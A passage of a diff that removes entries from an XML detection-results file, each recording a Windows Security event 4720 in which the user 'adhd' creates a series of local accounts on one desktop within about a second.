-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.4675460Z'/&gt;&lt;EventRecordID&gt;4447&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Tiffany&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1067&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Tiffany&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Tiffany</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4441</recordid>
-            <time>2020-06-11 22:04:57.386114700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.3861147Z'/&gt;&lt;EventRecordID&gt;4441&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Randy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1066&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Randy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Randy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4435</recordid>
-            <time>2020-06-11 22:04:57.295090600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.2950906Z'/&gt;&lt;EventRecordID&gt;4435&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Patricia&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1065&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Patricia&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Patricia</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4429</recordid>
-            <time>2020-06-11 22:04:57.209098100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.2090981Z'/&gt;&lt;EventRecordID&gt;4429&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Heather&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1064&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Heather&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Heather</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4423</recordid>
-            <time>2020-06-11 22:04:57.136741300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.1367413Z'/&gt;&lt;EventRecordID&gt;4423&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Henry&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1063&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Henry&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Henry</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4417</recordid>
-            <time>2020-06-11 22:04:56.968572700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.9685727Z'/&gt;&lt;EventRecordID&gt;4417&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Juan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1062&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Juan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Juan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4411</recordid>
-            <time>2020-06-11 22:04:56.884637400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.8846374Z'/&gt;&lt;EventRecordID&gt;4411&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Helen&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1061&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Helen&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Helen</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4405</recordid>
-            <time>2020-06-11 22:04:56.797035600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.7970356Z'/&gt;&lt;EventRecordID&gt;4405&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Emily&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1060&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Emily&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Emily</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4399</recordid>
-            <time>2020-06-11 22:04:56.698208100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:56.6982081Z'/&gt;&lt;EventRecordID&gt;4399&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Lawrence&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1059&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Lawrence&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Lawrence</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4393</recordid>
-            <time>2020-06-11 22:04:56.623698600Z</time>
-            <channel>Security</channel>
